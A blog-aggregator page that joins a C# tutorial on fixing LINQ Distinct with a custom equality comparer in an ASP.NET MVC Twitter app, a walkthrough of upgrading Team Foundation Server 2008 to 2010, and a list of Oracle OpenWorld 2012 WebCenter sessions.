There is some description of the code before we talk about the Distinct operator, but we'll get there soon. This is an ASP.NET MVC 2 application, written with VS 2010.
Here's the View that produces this screen:

<%@ Page Language="C#" MasterPageFile="~/Views/Shared/Site.Master" Inherits="System.Web.Mvc.ViewPage<TwitterFriendsViewModel>" %>
<%@ Import Namespace="DistinctSelectList.Models" %>
<asp:Content ID="Content1" ContentPlaceHolderID="TitleContent" runat="server">
    Home Page
</asp:Content>
<asp:Content ID="Content2" ContentPlaceHolderID="MainContent" runat="server">
    <fieldset>
        <legend>Twitter Friends</legend>
        <div>
            <%= Html.DropDownListFor(
                    twendVM => twendVM.FriendNames,
                    Model.FriendNames,
                    "<All Friends>") %>
        </div>
        <div>
            <% Html.Telerik().Grid<TweetViewModel>(Model.Tweets)
                   .Name("TwitterFriendsGrid")
                   .Columns(cols =>
                    {
                        cols.Template(col =>
                            { %>
                                <img src="<%= col.ImageUrl %>"
                                     alt="<%= col.ScreenName %>" />
                        <% });
                        cols.Bound(col => col.ScreenName);
                        cols.Bound(col => col.Tweet);
                    })
                   .Render(); %>
        </div>
    </fieldset>
</asp:Content>

As shown above, the Grid is from Telerik's Extensions for ASP.NET MVC. The first column is a template that renders the user's avatar from a URL provided by the Twitter query. Both the Grid and DropDownListFor display properties that are collections from a TwitterFriendsViewModel class, shown below:

using System.Collections.Generic;
using System.Web.Mvc;

namespace DistinctSelectList.Models
{
    /// <summary>
    /// For finding friend info on screen
    /// </summary>
    public class TwitterFriendsViewModel
    {
        /// <summary>
        /// Display names of friends in drop-down list
        /// </summary>
        public List<SelectListItem> FriendNames { get; set; }

        /// <summary>
        /// Display tweets in grid
        /// </summary>
        public List<TweetViewModel> Tweets { get; set; }
    }
}

I created the TwitterFriendsViewModel. The two Lists are what the View consumes to populate the DropDownListFor and Grid. Notice that FriendNames is a List of SelectListItem, which is an MVC class. Another custom class I created is the TweetViewModel (the type of the Tweets List), shown below:

namespace DistinctSelectList.Models
{
    /// <summary>
    /// Info on friend tweets
    /// </summary>
    public class TweetViewModel
    {
        /// <summary>
        /// User's avatar
        /// </summary>
        public string ImageUrl { get; set; }

        /// <summary>
        /// User's Twitter name
        /// </summary>
        public string ScreenName { get; set; }

        /// <summary>
        /// Text containing user's tweet
        /// </summary>
        public string Tweet { get; set; }
    }
}

The initial Twitter query returns much more information than we need for our purposes, and this is a special class for displaying info in the View. Now you know about the View and how it's constructed. Let's look at the controller next. The controller for this demo performs authentication, data retrieval, data manipulation, and view selection. I'll skip the description of the authentication because it's a normal part of using OAuth with LINQ to Twitter. Instead, we'll drill down and focus on the Distinct operator.
However, I'll show you the entire controller below, so that you can see how it all fits together:

using System.Linq;
using System.Web.Mvc;
using DistinctSelectList.Models;
using LinqToTwitter;

namespace DistinctSelectList.Controllers
{
    [HandleError]
    public class HomeController : Controller
    {
        private MvcOAuthAuthorization auth;
        private TwitterContext twitterCtx;

        /// <summary>
        /// Display a list of friends' current tweets
        /// </summary>
        public ActionResult Index()
        {
            auth = new MvcOAuthAuthorization(InMemoryTokenManager.Instance, InMemoryTokenManager.AccessToken);

            string accessToken = auth.CompleteAuthorize();
            if (accessToken != null)
            {
                InMemoryTokenManager.AccessToken = accessToken;
            }

            if (auth.CachedCredentialsAvailable)
            {
                auth.SignOn();
            }
            else
            {
                return auth.BeginAuthorize();
            }

            twitterCtx = new TwitterContext(auth);

            var friendTweets =
                (from tweet in twitterCtx.Status
                 where tweet.Type == StatusType.Friends
                 select new TweetViewModel
                 {
                     ImageUrl = tweet.User.ProfileImageUrl,
                     ScreenName = tweet.User.Identifier.ScreenName,
                     Tweet = tweet.Text
                 })
                .ToList();

            var friendNames =
                (from tweet in friendTweets
                 select new SelectListItem
                 {
                     Text = tweet.ScreenName,
                     Value = tweet.ScreenName
                 })
                .Distinct()
                .ToList();

            var twendsVM = new TwitterFriendsViewModel
            {
                Tweets = friendTweets,
                FriendNames = friendNames
            };

            return View(twendsVM);
        }

        public ActionResult About()
        {
            return View();
        }
    }
}

The important parts of the listing above are the LINQ to Twitter queries for friendTweets and friendNames. Both of these results are used in the subsequent population of the twendsVM instance that is passed to the view. Let's dissect these two statements for clarification and focus on what is happening with Distinct. The query for friendTweets gets a list of the 20 most recent tweets (as specified by the Twitter API for friend queries) and performs a projection into the custom TweetViewModel class, repeated below for your convenience:

var friendTweets =
    (from tweet in twitterCtx.Status
     where tweet.Type == StatusType.Friends
     select new TweetViewModel
     {
         ImageUrl = tweet.User.ProfileImageUrl,
         ScreenName = tweet.User.Identifier.ScreenName,
         Tweet = tweet.Text
     })
    .ToList();

The LINQ to Twitter query above simplifies what we need to work with in the View and reduces the amount of information we have to look at in subsequent queries. Given the friendTweets above, the next query performs another projection into an MVC SelectListItem, which is required for binding to the DropDownList. This brings us to the focus of this blog post: writing a correct query that uses the Distinct operator. The query below uses LINQ to Objects, querying the friendTweets collection to get friendNames:

var friendNames =
    (from tweet in friendTweets
     select new SelectListItem
     {
         Text = tweet.ScreenName,
         Value = tweet.ScreenName
     })
    .Distinct()
    .ToList();

The above implementation of Distinct seems normal, but it is deceptively incorrect. After running the query above, by executing the application, you'll notice that the drop-down list contains many duplicates. This will send you back to the code scratching your head, but there's a reason why this happens. To understand the problem, we must examine how Distinct works in LINQ to Objects. Distinct has two overloads: one without parameters, as shown above, and another that takes a parameter of type IEqualityComparer<T>. In the case above, with no parameters, Distinct will call EqualityComparer<T>.Default behind the scenes to make comparisons as it iterates through the list.
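Before looking at the fix, here's a short sketch of my own (not from the article) that demonstrates what the parameterless overload is doing under the hood - EqualityComparer<T>.Default falls back to reference equality for classes like SelectListItem that don't implement IEquatable<T>:

using System;
using System.Collections.Generic;
using System.Web.Mvc;

class DefaultComparerSketch
{
    static void Main()
    {
        var a = new SelectListItem { Text = "JoeMayo", Value = "JoeMayo" };
        var b = new SelectListItem { Text = "JoeMayo", Value = "JoeMayo" };

        // False: two separate references, even though every value matches.
        Console.WriteLine(EqualityComparer<SelectListItem>.Default.Equals(a, b));

        // True: string implements IEquatable<string>, so values are compared.
        Console.WriteLine(EqualityComparer<string>.Default.Equals("JoeMayo", "JoeMayo"));
    }
}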
You don't have problems with the built-in types, such as string, int, DateTime, etc., because they all implement IEquatable<T>. However, many .NET Framework classes, such as SelectListItem, don't implement IEquatable<T>. So, what happens is that EqualityComparer<T>.Default results in a call to Object.Equals, which performs reference equality on reference type objects. You don't have this problem with value types, because the default implementation of Object.Equals is bitwise equality. However, most of your projections that use Distinct are on classes, just like the SelectListItem used in this demo application. So, the reason why Distinct didn't produce the results we wanted is that we used a type that doesn't define its own equality, and Distinct used the default reference equality. This resulted in all objects being included in the results, because they are all separate instances in memory with unique references. As you might have guessed, the solution to the problem is to use the second overload of Distinct that accepts an IEqualityComparer<T> instance. If you were projecting into your own custom type, you could make that type implement IEqualityComparer<T>, but SelectListItem belongs to the .NET Framework Class Library. Therefore, the solution is to create a custom type that implements IEqualityComparer<T>, as in the SelectListItemComparer class, shown below:

using System.Collections.Generic;
using System.Web.Mvc;

namespace DistinctSelectList.Models
{
    public class SelectListItemComparer : EqualityComparer<SelectListItem>
    {
        public override bool Equals(SelectListItem x, SelectListItem y)
        {
            return x.Value.Equals(y.Value);
        }

        public override int GetHashCode(SelectListItem obj)
        {
            return obj.Value.GetHashCode();
        }
    }
}

The SelectListItemComparer class above doesn't implement IEqualityComparer<SelectListItem> directly, but rather derives from EqualityComparer<SelectListItem>. Microsoft recommends this approach for consistency with the behavior of generic collection classes. However, if your custom type already derives from a base class, go ahead and implement IEqualityComparer<T>, which will still work. EqualityComparer<T> is an abstract class that implements IEqualityComparer<T> with abstract Equals and GetHashCode methods. For the purposes of this application, the SelectListItem.Value property is sufficient to determine if two items are equal. Since SelectListItem.Value is type string, the code delegates equality to the string class. The code also delegates the GetHashCode operation to the string class. You might have other criteria in your own object and would need to define what it means for your object to be equal. Now that we have an IEqualityComparer<SelectListItem>, let's fix the problem. The code below modifies the query where we want distinct values:

var friendNames =
    (from tweet in friendTweets
     select new SelectListItem
     {
         Text = tweet.ScreenName,
         Value = tweet.ScreenName
     })
    .Distinct(new SelectListItemComparer())
    .ToList();

Notice how the code above passes a new instance of SelectListItemComparer as the parameter to the Distinct operator. Now, when you run the application, the drop-down list will behave as you expect, showing only a unique set of names. In addition to Distinct, other LINQ standard query operators have overloads that accept an IEqualityComparer<T>. You can use the same techniques shown here with SelectListItemComparer with those other operators as well.
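As a quick illustration of that last point, here's a sketch of my own (not from the article) reusing SelectListItemComparer with Union, which has the same comparer-less pitfall as Distinct:

using System.Collections.Generic;
using System.Linq;
using System.Web.Mvc;

class UnionWithComparerSketch
{
    static void Main()
    {
        var listA = new List<SelectListItem>
        {
            new SelectListItem { Text = "JoeMayo", Value = "JoeMayo" }
        };
        var listB = new List<SelectListItem>
        {
            new SelectListItem { Text = "JoeMayo", Value = "JoeMayo" }
        };

        // Without the comparer, Union would keep both items because they
        // are different references; with it, the duplicate is removed.
        var combined = listA.Union(listB, new SelectListItemComparer()).ToList();
        // combined.Count == 1
    }
}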
Now you know how to resolve problems with getting Distinct to work properly and also have a way to fix problems with other operators that require equality comparisons. @JoeMayo

    Read the article

  • Upgrading Team Foundation Server 2008 to 2010

    - by Martin Hinshelwood
I am sure you will have seen my posts on upgrading our internal Team Foundation Server from TFS2008 to TFS2010 Beta 2, RC and RTM, but what about a fresh upgrade of TFS2008 to TFS2010 using the RTM version of TFS? One of our clients is taking the plunge with TFS2010, so I have the job of doing the upgrade. It is sometimes very useful to have a team member that starts work when most of the Sydney workers are heading home, as I can do the upgrade without impacting them. The downside is that if you have any blockers then you can be pretty sure that everyone that can deal with your problem is asleep. I am starting with an existing blank installation of TFS 2010, but Adam Cogan let slip that he was the one that did the install, so I thought it prudent to make sure that it was OK.

Verifying Team Foundation Server 2010

We need to check that TFS 2010 has been installed correctly. First, check the Admin console and have a root around for any errors. Figure: Even the SQL Setup looks good. I don't know how Adam did it!

Backing up the Team Foundation Server 2008 Databases

As we are moving from one server to another (the recommended method) we will be taking a backup of our TFS2008 databases and restoring them to the SQL Server for the new TFS2010 server. Do not just detach and reattach. This will cause problems with the version of the database. If you are running a test migration you just need to create a backup of the TFS 2008 databases, but if you are doing the live migration then you should stop IIS on the TFS 2008 server before you back up the databases. This will stop any inadvertent check-ins or changes to TFS 2008. Figure: Stop IIS before you take a backup to prevent any TFS 2008 changes being written to the database. It is good to leave a little time between taking the TFS 2008 server offline and commencing the upgrade, as there is always one developer who has not finished and starts screaming. This time it was John Liu that needed 10 more minutes to make his changes and check in, so I always give it 30 minutes and see if anyone screams.

John Liu [SSW] said: are you doing something to TFS :-O
MrHinsh [SSW UK][VS ALM MVP] said: I have stopped TFS 2008 as per my emails
John Liu [SSW] said: haven't finish check in @_@ can we have it for 10mins? :)
MrHinsh [SSW UK][VS ALM MVP] said: TFS 2008 has been started
John Liu [SSW] said: I love you!
- IM conversation at TFS Upgrade +25 minutes

After John confirmed that he had everything done I turned IIS off again and made a cup of tea. There were no more screams, so the upgrade could continue. Figure: Backup all of the databases for TFS and include the Reporting Services, just in case. Figure: Check that all the backups have been taken. Once you have your backups, you need to copy them to your new TFS2010 server and restore them. This is a good way to proceed, because if we have any problems, or just plain run out of time, then you just turn the TFS 2008 server back on and all you have lost is one upgrade day, and not 10 developer days. As per the rules, you should record the number of files and the total number of areas and iterations before the upgrade so you have something to compare to:

TFS2008 file count:
Type 1: 1845
Type 2: 15770
Areas & Iterations: 139

You can use this to verify that the upgrade was successful. It should, however, be noted that the numbers in TFS 2010 will be bigger. This is due to some of the sorting out that TFS does during the upgrade process.
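If you'd rather script the before-and-after counts than pull them by hand, something along these lines works against the TFS 2010 client API. This is a rough sketch of my own, not part of the original walkthrough; the collection URL is a placeholder you'd substitute with your own:

using System;
using Microsoft.TeamFoundation.Client;
using Microsoft.TeamFoundation.VersionControl.Client;

class CountVersionedItems
{
    static void Main()
    {
        // Hypothetical collection URL - replace with your own server address.
        var tpc = new TfsTeamProjectCollection(
            new Uri("http://tfsserver:8080/tfs/DefaultCollection"));

        var vcs = tpc.GetService<VersionControlServer>();

        // Count every item under version control, recursing from the root.
        ItemSet items = vcs.GetItems("$/", RecursionType.Full);
        Console.WriteLine("Items under version control: {0}", items.Items.Length);
    }
}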
Restore Team Foundation Server 2008 Databases

Restoring the databases is much more time consuming than just attaching them, as you need to do them one at a time. But you may be taking a backup of an operational database and need to restore all your databases to a particular point in time instead of to the latest. I am restoring to the latest unless I encounter any problems. Figure: Restore each of the databases to either the latest or a specific point in time. Figure: Restore all of the required databases. Now that all of your databases are restored, you need to upgrade them to Team Foundation Server 2010.

Upgrade Team Foundation Server 2008 Databases

This is probably the easiest part of the process. You need to call a fire-and-forget command that will go off to the database specified, find the TFS 2008 databases and upgrade them to 2010. During this process all six of the main TFS 2008 databases are merged into the TfsVersionControl database, upgraded, and then the database is renamed to TFS_[CollectionName]. The rename applies only to the database and not the physical files, so it is worth going back and renaming the physical file as well. This keeps everything neat and tidy. If you plan to keep the old TFS 2008 server around, for example if you are doing a test migration first, then you will need to change the TFS GUID. This GUID is unique to each TFS instance and is preserved when you upgrade. This GUID is used by the clients, and they can get a little confused if there are two servers with the same one. To kick off the upgrade you need to open a command prompt, change the path to "C:\Program Files\Microsoft Team Foundation Server 2010\Tools" and run the "import" command in "tfsconfig".

TfsConfig import /sqlinstance:<Previous TFS Data Tier>
                 /collectionName:<Collection Name>
                 /confirmed

Imports a TFS 2005 or 2008 data tier as a new project collection. Important: This command should only be executed after adequate backups have been performed. After you import, you will need to configure portal and reporting settings via the administration console.

EXAMPLES
--------
TfsConfig import /sqlinstance:tfs2008sql /collectionName:imported /confirmed
TfsConfig import /sqlinstance:tfs2008sql\Instance /collectionName:imported /confirmed

OPTIONS:
--------
sqlinstance         The sql instance of the TFS 2005 or 2008 data tier. The TFS databases at that location will be modified directly and will no longer be usable as previous version databases. Ensure you have back-ups.
collectionName      The name of the new Team Project Collection.
confirmed           Confirm that you have backed-up databases before importing.

This command will automatically look for the TfsIntegration database and verify that all the other required databases exist. In this case it took around 5 minutes to complete the upgrade, as the total database size was under 700MB. This was unlike the upgrade of SSW's production database, with over 17GB of data, which took a few hours. At the end of the process you should get no errors and no warnings:

The Upgrade operation on the ApplicationTier feature has completed. There were 0 errors and 0 warnings.

As this is a new server and not a pure upgrade, there should not be a problem with the GUID. If you think at any point you will be doing this more than once, for example doing a test migration, or merging many TFS 2008 instances into a single one, then you should go back and rename the physical TfsVersionControl.mdf file to match the new collection.
This will avoid confusion later down the line. To do this, detach the new collection from the server and rename the physical files. Then reattach and change the physical file locations to match the new name. You can follow http://www.mssqltips.com/tip.asp?tip=1122 for a more detailed explanation of how to do this. Figure: Stop the collection so TFS does not take a wobbly when we detach the database. When you try to start the new collection again you will get a conflict with project names and will need to remove the Test Upgrade collection. This is fine; it just needs to be detached. Figure: Detaching the test upgrade from the new Team Foundation Server 2010 so we can start the new collection again. You will now be able to start the new upgraded collection, and you are ready for testing. Do you remember the stats we took off the TFS 2008 server?

TFS2008 file count:
Type 1: 1845
Type 2: 15770
Areas & Iterations: 139

Well, now we need to compare them to the TFS 2010 stats, remembering that there will probably be more files under source control.

TFS2010 file count:
Type 1: 19288
Areas & Iterations: 139

Lovely: the number of iterations is the same, and the number of files is bigger. Just what we were looking for.

Testing the upgraded Team Foundation Server 2010 Project Collection

Can we connect to the new collection and project? Figure: We can connect to the new collection and project. Figure: Make sure you can connect to the upgraded projects and that you can see all of the files. Figure: Team Web Access is there and working. Note that for Team Web Access you now use the same port and URL as for TFS 2010. So in this case, as I am running on the local box, you need to use http://localhost:8080/tfs, which will redirect you to http://localhost:8080/tfs/web for the web access. If you need to connect with a Visual Studio 2008 client you will need to use the full path of the new collection, http://[servername]/tfs/[collectionname], and this will work with all of your collections. With Visual Studio 2005 you will only be able to connect to the Default collection, and in both VS2008 and VS2005 you will need to install the forward compatibility updates:

Visual Studio Team System 2005 Service Pack 1 Forward Compatibility Update for Team Foundation Server 2010
Visual Studio Team System 2008 Service Pack 1 Forward Compatibility Update for Team Foundation Server 2010

To make sure that you have everything up to date, run SSW Diagnostics and get all green ticks.

Upgrade Done!

At this point you can send out a notice to everyone that the upgrade is complete and give them the connection details. You need to remember that at this stage we have a 2008 project upgraded to run under TFS 2010, but it is still running under the same process template that it was running before. You can only "enable" 2010 features in a process template; you can't upgrade it. So what to do? Well, you need to create a new project and migrate the things you want to keep across. Source code is easy - you can move or branch - but work items are more difficult, as you can't move them between projects. This instance is complicated further because the old project uses the Conchango/EMC Scrum for Team System template, and I will need to write a script/application to get the work items across with their attachments intact. That is my next task! Technorati Tags: TFS 2010,TFS 2008,VS ALM

    Read the article

  • 26 Days: Countdown to Oracle OpenWorld 2012

    - by Michael Snow
Welcome to our countdown to Oracle OpenWorld! Oracle OpenWorld 2012 is just around the corner. In less than 26 days, San Francisco will be invaded by an expected 50,000 people from all over the world. Here on the Oracle WebCenter team, we've all been working to help make the experience a great one for all our WebCenter customers. For a sneak peek, we'll be spending this week giving you a teaser of what to look forward to if you are joining us in San Francisco from September 30th through October 4th. We have Oracle WebCenter sessions covering all topics imaginable. Take a look and use the tools we provide to build out your schedule in advance and reserve your seats in your favorite sessions. That gives you plenty of time to plan for your week with us in San Francisco. If, unfortunately, your boss denied your request to attend, there are still some ways that you can join in the experience virtually on demand. This year we are expanding even further north of Market Street and will be taking over Union Square as well. Check out this map of San Francisco to get a sense of how much of a footprint Oracle OpenWorld has grown to this year. With so much to see and so many sessions to learn from, it's no wonder that people get excited. Add to that a good mix of fun and all of the possible WebCenter sessions you could attend, and you won't want to sleep at all if you're to take full advantage of such an opportunity. We'll also have our annual WebCenter Customer Appreciation reception - stay tuned this week for some more info on registration to make sure you'll be able to join us. If you've been following the America's Cup at all and believe in EXTREME PERFORMANCE, you'll definitely want to take a look at this video from last year's OpenWorld keynote.

Important OpenWorld Links:

Attendee / Presenters Toolkit
Oracle Schedule Builder
WebCenter Sessions (listed in the catalog under Fusion Middleware as "Portals, Sites, Content, and Collaboration")
Oracle Music Festival - AMAZING line-up!!
Oracle Customer Appreciation Night - LOOK HERE!!
Oracle OpenWorld LIVE On-Demand

Here are all the WebCenter sessions broken down by day for your viewing pleasure.

Monday, October 1st

CON8885 - Simplify CRM Engagement with Contextual Collaboration

Are your sales teams disconnected and disengaged? Do you want a tool for easily connecting expertise across your organization and providing visibility into the complete sales process? Do you want a way to enhance and retain organization knowledge? Oracle Social Network is the answer. Attend this session to learn how to make CRM easy, effective, and efficient for use across virtual sales teams.
Also learn how Oracle Social Network can drive sales force collaboration with natural conversations throughout the sales cycle, promote sales team productivity through purposeful social networking without the noise, and build cross-team knowledge by integrating conversations with CRM and other business applications. CON8268 - Oracle WebCenter Strategy: Engaging Your Customers. Empowering Your Business Oracle WebCenter is a user engagement platform for social business, connecting people and information. Attend this session to learn about the Oracle WebCenter strategy, and understand where Oracle is taking the platform to help companies engage customers, empower employees, and enable partners. Business success starts with ensuring that everyone is engaged with the right people and the right information and can access what they need through the channel of their choice—Web, mobile, or social. Are you giving customers, employees, and partners the best-possible experience? Come learn how you can! ¶ HOL10208 - Add Social Capabilities to Your Enterprise Applications Oracle Social Network enables you to add real-time collaboration capabilities into your enterprise applications, so that conversations can happen directly within your business systems. In this hands-on lab, you will try out the Oracle Social Network product to collaborate with other attendees, using real-time conversations with document sharing capabilities. Next you will embed social capabilities into a sample Web-based enterprise application, using embedded UI components. Experts will also write simple REST-based integrations, using the Oracle Social Network API to programmatically create social interactions. ¶ CON8893 - Improve Employee Productivity with Intuitive and Social Work Environments Social technologies have already transformed the ways customers, employees, partners, and suppliers communicate and stay informed. Forward-thinking organizations today need technologies and infrastructures to help them advance to the next level and integrate social activities with business applications to deliver a user experience that simplifies business processes and enterprise application engagement. Attend this session to hear from an innovative Oracle Social Network customer and learn how you can improve productivity with intuitive and social work environments and empower your employees with innovative social tools to enable contextual access to content and dynamic personalization of solutions. ¶ CON8270 - Oracle WebCenter Content Strategy and Vision Oracle WebCenter provides a strategic content infrastructure for managing documents, images, e-mails, and rich media files. With a single repository, organizations can address any content use case, such as accounts payable, HR onboarding, document management, compliance, records management, digital asset management, or Website management. In this session, learn about future plans for how Oracle WebCenter will address new use cases as well as new integrations with Oracle Fusion Middleware and Oracle Applications, leveraging your investments by making your users more productive and error-free. ¶ CON8269 - Oracle WebCenter Sites Strategy and Vision Oracle’s Web experience management solution, Oracle WebCenter Sites, enables organizations to use the online channel to drive customer acquisition and brand loyalty. It helps marketers and business users easily create and manage contextually relevant, social, interactive online experiences across multiple channels on a global scale. 
In this session, learn about future plans for how Oracle WebCenter Sites will provide you with the tools, capabilities, and integrations you need in order to continue to address your customers’ evolving requirements for engaging online experiences and keep moving your business forward. ¶ CON8896 - Living with SharePoint SharePoint is a popular platform, but it’s not always the best fit for Oracle customers. In this session, you’ll discover the technical and nontechnical limitations and pitfalls of SharePoint and learn about Oracle alternatives for collaboration, portals, enterprise and Web content management, social computing, and application integration. The presentation shows you how to integrate with SharePoint when business or IT requirements dictate and covers cloud-based (Office 365) and on-premises versions of SharePoint. Presented by a former Microsoft director of SharePoint product management and backed by independent customer research, this session will prepare you to answer the question “Why don’t we just use SharePoint for that?’ the next time it comes up in your organization. ¶ CON7843 - Content-Enabling Enterprise Processes with Oracle WebCenter Organizations today continually strive to automate business processes, reduce costs, and improve efficiency. Many business processes are content-intensive and unstructured, requiring ad hoc collaboration, and distributed in nature, requiring many approvals and generating huge volumes of paper. In this session, learn how Oracle and SYSTIME have partnered to help a customer content-enable its enterprise with Oracle WebCenter Content and Oracle WebCenter Imaging 11g and integrate them with Oracle Applications. ¶ CON6114 - Tape Robotics’ Newest Superhero: Now Fueled by Oracle Software For small, midsize, and rapidly growing businesses that want the most energy-efficient, scalable storage infrastructure to meet their rapidly growing data demands, Oracle’s most recent addition to its award-winning tape portfolio leverages several pieces of Oracle software. With Oracle Linux, Oracle WebLogic, and Oracle Fusion Middleware tools, the library achieves a higher level of usability than previous products while offering customers a familiar interface for management, plus ease of use. This session examines the competitive advantages of the tape library and how Oracle software raises customer satisfaction. Learn how the combination of Oracle engineered systems, Oracle Secure Backup, and Oracle’s StorageTek tape libraries provide end-to-end coverage of your data. ¶ CON9437 - Mobile Access Management With more than five billion mobile devices on the planet and an increasing number of users using their own devices to access corporate data and applications, securely extending identity management to mobile devices has become a hot topic. This session focuses on how to extend your existing identity management infrastructure and policies to securely and seamlessly enable mobile user access. CON7815 - Customer Experience Online in Cloud: Oracle WebCenter Sites, Oracle ATG Apps, Oracle Exalogic Oracle WebCenter Sites and Oracle’s ATG product line together can provide a compelling marketing and e-commerce experience. When you couple them with the extreme performance of Oracle Exalogic, you’ll see unmatched scalability that provides you with a true cloud-based solution. In this session, you’ll learn how running Oracle WebCenter Sites and ATG applications on Oracle Exalogic delivers both a private and a public cloud experience. 
Find out what it takes to get these systems working together and delivering engaging Web experiences. Even if you aren’t considering Oracle Exalogic today, the rich Web experience of Oracle WebCenter, paired with the depth of the ATG product line, can provide your business full support, from merchandising through sale completion. ¶ CON8271 - Oracle WebCenter Portal Strategy and Vision To innovate and keep a competitive edge, organizations need to leverage the power of agile and responsive Web applications. Oracle WebCenter Portal enables you to do just that, by delivering intuitive user experiences for enterprise applications to drive innovation with composite applications and mashups. Attend this session to learn firsthand from customers how Oracle WebCenter Portal extends the value of existing enterprise applications, business processes, and content; delivers a superior business user experience; and maximizes limited IT resources. ¶ CON8880 - The Connected Customer Experience Begins with the Online Channel There’s a lot of talk these days about how to connect the customer journey across various touchpoints—from Websites and e-commerce to call centers and in-store—to provide experiences that are more relevant and engaging and ultimately gain competitive edge. Doing it all at once isn’t a realistic objective, so where do you start? Come to this session, and hear about three steps you can take that can help you begin your journey toward delivering the connected customer experience. You’ll hear how Oracle now has an integrated digital marketing platform for your corporate Website, your e-commerce site, your self-service portal, and your marketing and loyalty campaigns, and you’ll learn what you can do today to begin executing on your customer experience initiatives. ¶ GEN11451 - General Session: Building Mobile Applications with Oracle Cloud With the prevalence of smart mobile devices, companies are facing an increased demand to provide access to data and applications from new channels. However, developing applications for mobile devices poses some unique challenges. Come to this session to learn how Oracle addresses these challenges, offering a simpler way to develop and deploy cross-device mobile applications. See how Oracle Cloud enables you to access applications, data, and services from mobile channels in an easier way.  CON8272 - Oracle Social Network Strategy and Vision One key way of increasing employee productivity is by bringing people, processes, and information together—providing new social capabilities to enable business users to quickly correspond and collaborate on business activities. Oracle WebCenter provides a user engagement platform with social and collaborative technologies to empower business users to focus on their key business processes, applications, and content in the context of their role and process. Attend this session to hear how the latest social capabilities in Oracle Social Network are enabling organizations to transform themselves into social businesses.  --- Tuesday, October 2nd HOL10194 - Enterprise Content Management Simplified: Oracle WebCenter Content’s Next-Generation UI Regardless of the nature of your business, unstructured content underpins many of its daily functions. Whether you are working with traditional presentations, spreadsheets, or text documents—or even with digital assets such as images and multimedia files—your content needs to be accessible and manageable in convenient and intuitive ways to make working with the content easier. 
Additionally, you need the ability to easily share documents with coworkers to facilitate a collaborative working environment. Come to this session to see how Oracle WebCenter Content’s next-generation user interface helps modern knowledge workers easily manage personal and enterprise documents in a collaborative environment.¶ CON8877 - Develop a Mobile Strategy with Oracle WebCenter: Engage Customers, Employees, and Partners Mobile technology has gone from nice-to-have to a cornerstone of user engagement. Mobile access enables users to have information available at their fingertips, enabling them to take action the moment they make a decision, interact in the moment of convenience, and take advantage of new service offerings in their preferred channels. All your employees have your mobile applications in their pocket; now what are you going to do? It is a critical step for companies to think through what their employees, customers, and partners really need on their devices. Attend this session to see how Oracle WebCenter enables you to better engage your customers, employees, and partners by providing a unified experience across multiple channels. ¶ CON9447 - Enabling Access for Hundreds of Millions of Users How do you grow your business by identifying, authenticating, authorizing, and federating users on the Web, leveraging social identity and the open source OAuth protocol? How do you scale your access management solution to support hundreds of millions of users? With social identity support out of the box, Oracle’s access management solution is also benchmarked for 250-million-user deployment according to real-world customer scenarios. In this session, you will learn about the social identity capability and the 250-million-user benchmark testing of Oracle Access Manager and Oracle Adaptive Access Manager running on Oracle Exalogic and Oracle Exadata. ¶ HOL10207 - Build an Intranet Portal with Oracle WebCenter In this hands-on lab, you’ll work with Oracle WebCenter Portal and Oracle WebCenter Content to build out an enterprise portal that maximizes the productivity of teams and individual contributors. Using browser-based tools, you’ll manage site resources such as page styles, templates, and navigation. You’ll edit content stored in Oracle WebCenter Content directly from your portal. You’ll also experience the latest features that promote collaboration, social networking, and personal productivity. ¶ CON2906 - Get Proactive: Best Practices for Maintaining Oracle Fusion Middleware You chose Oracle Fusion Middleware products to help your organization deliver superior business results. Now learn how to take full advantage of your software with all the great tools, resources, and product updates you’re entitled to through Oracle Support. In this session, Oracle product experts provide proven best practices to help you work more efficiently, plan and prepare for upgrades and patching more effectively, and manage risk. Topics include configuration management tools, remote diagnostics, My Oracle Support Community, and My Oracle Support Lifecycle Advisors. New users and Oracle Fusion Middleware experts alike are guaranteed to leave with fresh ideas and practical, easy-to-implement next steps. ¶ CON8878 - Oracle WebCenter’s Cloud Strategy: From Social and Platform Services to Mashups Cloud computing represents a paradigm shift in how we build applications, automate processes, collaborate, and share and in how we secure our enterprise. 
Additionally, as you adopt cloud-based services in your organization, it’s likely that you will still have many critical on-premises applications running. With these mixed environments, multiple user interfaces, different security, and multiple datasources and content sources, how do you start evolving your strategy to account for these challenges? Oracle WebCenter offers a complete array of technologies enabling you to solve these challenges and prepare you for the cloud. Attend this session to learn how you can use Oracle WebCenter in the cloud as well as create on-premises and cloud application mash-ups. ¶ CON8901 - Optimize Enterprise Business Processes with Oracle WebCenter and Oracle BPM Do you have business processes that span multiple applications? Are you grappling with how to have visibility across these business processes; how to manage content that is associated with these processes; and, most importantly, how to model and optimize these business processes? Attend this session to hear how Oracle WebCenter and Oracle Business Process Management provide a unique set of integrated solutions to provide a composite application dashboard across these business processes and offer a solution for content-centric business processes. ¶ CON8883 - Deliver Engaging Interfaces to Oracle Applications with Oracle WebCenter Critical business processes live within enterprise applications, and application users need to manage and execute these processes as effectively as possible. Oracle provides a comprehensive user engagement platform to increase user productivity and optimize overall processes within Oracle Applications—Oracle E-Business Suite and Oracle’s Siebel, PeopleSoft, and JD Edwards product families—and third-party applications. Attend this session to learn how you can integrate these applications with Oracle WebCenter to deliver composite application dashboards to your end users—whether they are your customers, partners, or employees—for enhanced usability and Web 2.0–enabled enterprise portals.¶ Wednesday, October 3rd CON8895 - Future-Ready Intranets: How Aramark Re-engineered the Application Landscape There are essential techniques and technologies you can use to deliver employee portals that garner higher productivity, improve business efficiency, and increase user engagement. Attend this session to learn how you can leverage Oracle WebCenter Portal as a user engagement platform for bringing together business process management, enterprise content management, and business intelligence into a highly relevant and integrated experience. Hear how Aramark has leveraged Oracle WebCenter Portal and Oracle WebCenter Content to deliver a unified workspace providing simpler navigation and processing, consolidation of tools, easy access to information, integrated search, and single sign-on. ¶ CON8886 - Content Consolidation: Save Money, Increase Efficiency, and Eliminate Silos Organizations are looking for ways to save money and be more efficient. With content in many different places, it’s difficult to know where to look for a document and whether the document is the most current version. With Oracle WebCenter, content can be consolidated into one best-of-breed repository that is secure, scalable, and integrated with your business processes and applications. Users can find the content they need, where they need it, and ensure that it is the right content. 
